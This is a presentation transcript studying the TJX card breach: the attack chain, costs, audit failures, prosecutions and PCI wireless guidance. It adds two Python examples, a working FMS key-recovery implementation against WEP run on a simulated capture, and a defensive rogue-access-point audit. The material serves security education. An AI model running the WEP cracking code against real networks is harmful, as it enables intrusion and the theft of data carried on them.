Ryan Paulsen, Chris Lafferty, Nilesh Nipane. Intruders gained access to credit card information between 2005 and 2007; roughly 50 million credit and debit card numbers were stolen.

Presentation transcript:


- Intruders gained access to credit card information between 2005 and 2007
- ~50 million credit and debit card numbers stolen
- ~½ million driver's license and Social Security numbers stolen
- Largest theft of its kind to date at the time
  - Previous record was 1.5 million credit card numbers

- WEP key cracked at a Marshalls store in St. Paul, Minnesota
- Attackers monitored and captured wireless traffic
- Used the captured data to recover the WEP key protecting traffic bound for the central database
- Harvested usernames and passwords from the decrypted traffic
- Created accounts on TJX systems

- Created accounts on the central database systems in Framingham, MA
- Gathered historical data from storage systems
  - Used by TJX to track returns
- Installed a custom sniffer tool ("blabla") that captured card numbers before they were encrypted
  - The attackers then logged into the systems and transferred the data files off them
- Stolen numbers used in a Wal-Mart gift card scam (~$1 million)

- Monetary cost/loss for nearly everyone involved
  - Customers may lose money, time, or other resources directly
  - Banks lose customers or reputation
  - TJX loses substantial amounts of money
    - Approximately $1.5 billion in fees, settlements, and new security measures mandated by the FTC
    - More than $195 million in new security equipment and training

- Reputation/business costs
  - Customer confidence
  - Federal Trade Commission's response
- Ethical and policy implications/movements
  - Ethical concerns around information protection, misuse of resources, privacy, etc.

- Impacts still being felt and analyzed
  - Legal issues / insufficiencies in legislation
  - The full extent of these attacks and how many systems were hit by the same people (new cases still coming to light)
  - The actions, and lack of action, taken in response by other companies

- A 2004 audit found TJX failed 9 of the 12 PCI DSS requirements for credit card merchants:
  - Misconfigured wireless networks
  - Poor antivirus protection
  - Weak intrusion detection
  - Easily guessable usernames and passwords
  - Poor log maintenance
  - Data encryption software not installed

- Initial breach
  - Due to deficiencies in the wireless network and the WEP encryption scheme
    - WEP has been publicly broken since the FMS (Fluhrer, Mantin, Shamir) attack
  - Attackers collected data transmitted by handheld devices used to communicate price markdowns and manage inventory
    - Used that traffic to recover the encryption key
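The two slides above describe the attack only in outline. The following is an added example (not from the presentation) that shows why the attack works: WEP seeds RC4 with IV || key, sends the 3-byte IV in the clear, and every data frame starts with the known LLC/SNAP byte 0xAA. For IVs of the weak form (B+3, 255, x) the first keystream byte leaks key byte B with roughly 5% probability, so a passive listener votes byte by byte, exactly the FMS attack. The capture is constructed (a 40-bit key and only weak IVs, far fewer frames than a real attack needs); the depth-first key verification at the end is an assumption added here to make recovery robust, not part of the original FMS paper.

```python
"""Simulated FMS (Fluhrer-Mantin-Shamir) key recovery against WEP (added example)."""
from collections import Counter

SNAP_FIRST_BYTE = 0xAA   # first plaintext byte of an 802.11 data frame (LLC/SNAP DSAP)


def rc4_ksa(key):
    """RC4 key-scheduling algorithm; returns the permuted state S."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S


def first_keystream_byte(iv, secret):
    """First PRGA output of RC4 keyed with IV || secret, as WEP does."""
    S = rc4_ksa(list(iv) + list(secret))
    i, j = 1, S[1]                      # one PRGA step: i = 1, j = 0 + S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) % 256]


def wep_first_ciphertext_byte(iv, secret):
    """What a sniffer sees: the known 0xAA XORed with the first keystream byte."""
    return SNAP_FIRST_BYTE ^ first_keystream_byte(iv, secret)


def fms_candidate(iv, known, out):
    """Candidate for key byte len(known), or None if the IV is not 'resolved'.

    Replays the first B+3 KSA steps (IV plus key bytes already recovered),
    checks the FMS resolved condition, then inverts the first output byte.
    """
    B = len(known)
    key = list(iv) + list(known)
    S = list(range(256))
    j = 0
    for i in range(B + 3):
        j = (j + S[i] + key[i]) % 256
        S[i], S[j] = S[j], S[i]
    if S[1] >= B + 3 or (S[1] + S[S[1]]) % 256 != B + 3:
        return None
    return (S.index(out) - j - S[B + 3]) % 256


def recover_key(capture, key_len, depth=3):
    """Vote on each key byte with FMS and verify the candidate key against the capture.

    capture: {iv: first_ciphertext_byte}. Depth-first over the top `depth`
    candidates per byte (assumed helper, in the spirit of aircrack's key test),
    so a byte whose true value is narrowly outvoted by noise is still found.
    """
    check = list(capture.items())[:16]

    def matches(key):
        return all(wep_first_ciphertext_byte(iv, key) == c for iv, c in check)

    def search(known):
        if len(known) == key_len:
            return bytes(known) if matches(known) else None
        votes = Counter()
        for iv, c in capture.items():
            if iv[0] == len(known) + 3:          # weak IVs for this byte position
                cand = fms_candidate(iv, known, c ^ SNAP_FIRST_BYTE)
                if cand is not None:
                    votes[cand] += 1
        for cand, _ in votes.most_common(depth):
            found = search(known + [cand])
            if found is not None:
                return found
        return None

    return search([])


def simulate_capture(secret):
    """Constructed passive capture: one frame per weak IV (B+3, 255, x)."""
    capture = {}
    for B in range(len(secret)):
        for x in range(256):
            iv = (B + 3, 255, x)
            capture[iv] = wep_first_ciphertext_byte(iv, secret)
    return capture


if __name__ == "__main__":
    secret = bytes([0x1F, 0x2A, 0x3B, 0x4C, 0x5D])     # constructed 40-bit WEP key
    recovered = recover_key(simulate_capture(secret), len(secret))
    print(recovered.hex(), recovered == secret)
```

The attacker never sends a frame; everything needed (IV in the clear, a known first plaintext byte, and enough weak IVs) is handed over by the protocol, which is why monitoring store traffic from the parking lot was sufficient. Real-world tooling needs far more frames than this simulation because only a fraction of captured IVs are weak, and later attacks (KoreK, PTW) reduced that requirement to tens of thousands of frames.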

- Other vulnerabilities
  - Kiosks with exposed USB ports were located in many TJX retail stores
    - Gave direct access to the company's network and were not protected by a firewall

- Feds tracked down and arrested 11 co-conspirators
- Uncovered a card-theft ring known as "Operation Get Rich or Die Trying"
- Led by Albert Gonzalez
- Ring responsible for most of the major credit card thefts in the US
  - Including the Heartland Payment Systems breach, now the largest of its kind

- Class action lawsuits
  - TJX reluctant to disclose data on the breach
  - Failed to detect the intrusion for 7 months, then took another month to disclose it
  - Plaintiffs seek to show negligence
- Watershed case
  - Companies must now be more open and transparent about how they protect customer data

- PCI Security Standards Council Data Security Standard (DSS)
  - Information supplement on wireless networks published July 2009 (PCI DSS Wireless Guideline)
  - Covers best practices for handling credit card information in environments with wireless networks

- Wireless Intrusion Detection/Prevention System (IDS/IPS)
  - Investigate and classify wireless networks and their access to cardholder data
  - Generate automatic alerts for rogue wireless connections
  - Have response plans to remove rogue connections

- Firewall off wireless networks that do not need access to cardholder data
  - Do not rely on VLAN separation alone; the guideline calls for a firewall between wireless networks and the cardholder data environment
  - Review firewall rules every 6 months
From Information Supplement: PCI DSS Wireless Guideline

- Protect wireless networks that transmit cardholder data
  - Physical protection
    - Secure access points so no one can reset them to factory defaults
    - Make sure access points aren't stolen
    - Don't store PSKs in obvious locations

- Protect wireless networks that transmit cardholder data
  - Change default configuration
    - Use enterprise (802.1X) mode when possible
    - Do not advertise the company name in the SSID
    - Only use SNMPv3
    - Disable unnecessary ports and protocols

- Protect wireless networks that transmit cardholder data
  - Logging and monitoring
    - Store wireless event logs for at least 90 days (PCI DSS Requirement 10.7 itself calls for one year of retention with three months immediately available)
    - Keep the network topology documentation up to date
  - Security
    - Use AES (CCMP) when possible
    - Use enterprise security (802.1X) when possible
    - PSKs of at least 13 characters

- Protect wireless networks that transmit cardholder data
  - Encryption
    - Use strong transport encryption; the 2009 guideline named SSLv3 with 256-bit encryption, but SSLv3 has since been deprecated (RFC 7568), so use TLS 1.2 or later
    - Treat wireless networks as an outside (untrusted) network
From Information Supplement: PCI DSS Wireless Guideline
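The wireless IDS/IPS slide and the four "protect wireless networks" slides above describe what to check; the following added example (not from the presentation or from the PCI SSC) turns those checks into detection logic run over a constructed site survey. The record fields (bssid, ssid, security, cipher, psk_len, snmp), the inventory of authorised access points, the survey rows and the company name used for the SSID rule are all assumptions made for the example; a real deployment would populate them from a WIDS export or `iw dev <if> scan` output.

```python
"""Rogue-AP and PCI wireless-guideline checks over a constructed site survey (added example)."""

COMPANY_NAME = "TJX"   # assumed; drives the "do not advertise the company name in the SSID" rule
MIN_PSK_LEN = 13       # PCI DSS Wireless Guideline recommendation

# Constructed inventory of authorised access points: BSSID -> SSID it is allowed to serve.
INVENTORY = {
    "00:11:22:33:44:01": "pos-net",
    "00:11:22:33:44:02": "TJX-Store",
}

# Constructed survey results. Field names are assumptions for this example.
SURVEY = [
    {"bssid": "00:11:22:33:44:01", "ssid": "pos-net", "security": "WPA2-EAP",
     "cipher": "CCMP", "psk_len": None, "snmp": "v3"},
    {"bssid": "00:11:22:33:44:02", "ssid": "TJX-Store", "security": "WPA2-PSK",
     "cipher": "TKIP", "psk_len": 8, "snmp": "v2c"},
    # Unknown radio broadcasting an authorised SSID: an evil twin, the TJX-style worst case.
    {"bssid": "de:ad:be:ef:00:01", "ssid": "pos-net", "security": "WEP",
     "cipher": "WEP", "psk_len": 5, "snmp": "v1"},
    # Unknown radio with its own SSID: a plain rogue AP.
    {"bssid": "de:ad:be:ef:00:02", "ssid": "Guest", "security": "OPEN",
     "cipher": None, "psk_len": None, "snmp": None},
]


def audit_ap(ap, inventory):
    """Return the list of finding codes for one observed access point."""
    authorised_ssids = set(inventory.values())
    findings = []
    if ap["bssid"] not in inventory:
        # Classification step from the IDS/IPS slide: unknown BSSID, with or
        # without impersonation of an authorised network.
        findings.append("EVIL_TWIN" if ap["ssid"] in authorised_ssids else "ROGUE_AP")
    if ap["security"] in ("OPEN", "WEP"):
        findings.append("NO_STRONG_CRYPTO")          # treat as an outside network
    if ap["cipher"] == "TKIP":
        findings.append("TKIP_NOT_AES")              # guideline: use AES (CCMP)
    if ap["security"].endswith("PSK"):
        findings.append("NOT_ENTERPRISE_MODE")       # prefer 802.1X where possible
        if ap["psk_len"] is not None and ap["psk_len"] < MIN_PSK_LEN:
            findings.append("PSK_TOO_SHORT")
    if COMPANY_NAME.lower() in ap["ssid"].lower():
        findings.append("SSID_NAMES_COMPANY")
    if ap["snmp"] in ("v1", "v2c"):
        findings.append("SNMP_NOT_V3")
    return findings


def audit_survey(survey, inventory):
    """Findings for every access point in the survey, keyed by BSSID."""
    return {ap["bssid"]: audit_ap(ap, inventory) for ap in survey}


def alerts(survey, inventory):
    """BSSIDs that need the guideline's alert-and-remove response: rogue or evil-twin radios."""
    return sorted(bssid for bssid, findings in audit_survey(survey, inventory).items()
                  if "ROGUE_AP" in findings or "EVIL_TWIN" in findings)


if __name__ == "__main__":
    for bssid, findings in audit_survey(SURVEY, INVENTORY).items():
        print(bssid, findings or "OK")
    print("alert:", alerts(SURVEY, INVENTORY))
```

The inventory diff is the part that matters operationally: the configuration rules only catch weaknesses on radios you know about, whereas the St. Paul Marshalls intrusion came through a network the auditors had rated as weak but nobody was watching for unauthorised clients or impersonating radios.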

- Chapter 6 – Database Security
- Chapter 7 – Security in Computing
- Chapter 9 – Economics of Cybersecurity
- Chapter 10 – Privacy
- Chapter 11 – Cryptography Explained
